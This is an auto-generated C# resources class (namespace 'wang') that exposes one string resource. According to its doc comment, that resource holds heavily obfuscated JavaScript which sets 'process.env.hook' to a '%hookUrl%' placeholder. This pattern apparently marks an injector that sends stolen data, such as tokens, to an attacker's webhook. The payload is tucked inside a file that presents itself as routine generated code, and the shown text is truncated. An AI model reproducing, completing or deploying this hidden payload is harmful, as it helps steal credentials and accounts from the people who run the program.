//------------------------------------------------------------------------------
// <auto-generated>
//     This code was generated by a tool.
//     Runtime Version:4.0.30319.42000
//
//     Changes to this file may cause incorrect behavior and will be lost if
//     the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------

namespace wang.Properties {
    using System;
    
    
    /// <summary>
    ///   A strongly-typed resource class, for looking up localized strings, etc.
    /// </summary>
    // This class was auto-generated by the StronglyTypedResourceBuilder
    // class via a tool like ResGen or Visual Studio.
    // To add or remove a member, edit your .ResX file then rerun ResGen
    // with the /str option, or rebuild your VS project.
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "16.0.0.0")]
    [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    internal class Resources {
        
        private static global::System.Resources.ResourceManager resourceMan;
        
        private static global::System.Globalization.CultureInfo resourceCulture;
        
        [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
        internal Resources() {
        }
        
        /// <summary>
        ///   Returns the cached ResourceManager instance used by this class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Resources.ResourceManager ResourceManager {
            get {
                if (object.ReferenceEquals(resourceMan, null)) {
                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("wang.Properties.Resources", typeof(Resources).Assembly);
                    resourceMan = temp;
                }
                return resourceMan;
            }
        }
        
        /// <summary>
        ///   Overrides the current thread's CurrentUICulture property for all
        ///   resource lookups using this strongly typed resource class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Globalization.CultureInfo Culture {
            get {
                return resourceCulture;
            }
            set {
                resourceCulture = value;
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to process.env.hook = &quot;%hookUrl%&quot;;
        ///var p=s,D=s,X=s,c=s,f=s;(function(A,n){var y=s,q=s,N=s,Z=s,I=s,M=A();while(!![]){try{var t=parseInt(y(&apos;0x4bb&apos;,&apos;idgY&apos;))/(0x1*0x18c7+-0x1*0xd3f+-0xb87)+-parseInt(y(&apos;0x3b2&apos;,&apos;MVVz&apos;))/(-0x21a*-0x1+0x193*-0x4+0x434)+parseInt(N(&apos;0x22c&apos;,&apos;Q(NG&apos;))/(-0x1*0x1fd2+0x1f73+-0x31*-0x2)+parseInt(N(&apos;0x487&apos;,&apos;ZG(1&apos;))/(-0x83f*-0x3+0x1e1f+-0x36d8)*(-parseInt(y(&apos;0x39b&apos;,&apos;2t74&apos;))/(-0x3bd+0x2da+0xe8))+-parseInt(N(&apos;0x41d&apos;,&apos;6E27&apos;))/(-0x1059+0x1048+0x17*0x1)+-parseInt(q(&apos;0x38c&apos;,&apos;JWR2&apos;))/(0xa7*0x23+0xfc7+ [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string _in {
            get {
                return ResourceManager.GetString("_in", resourceCulture);
            }
        }
    }
}
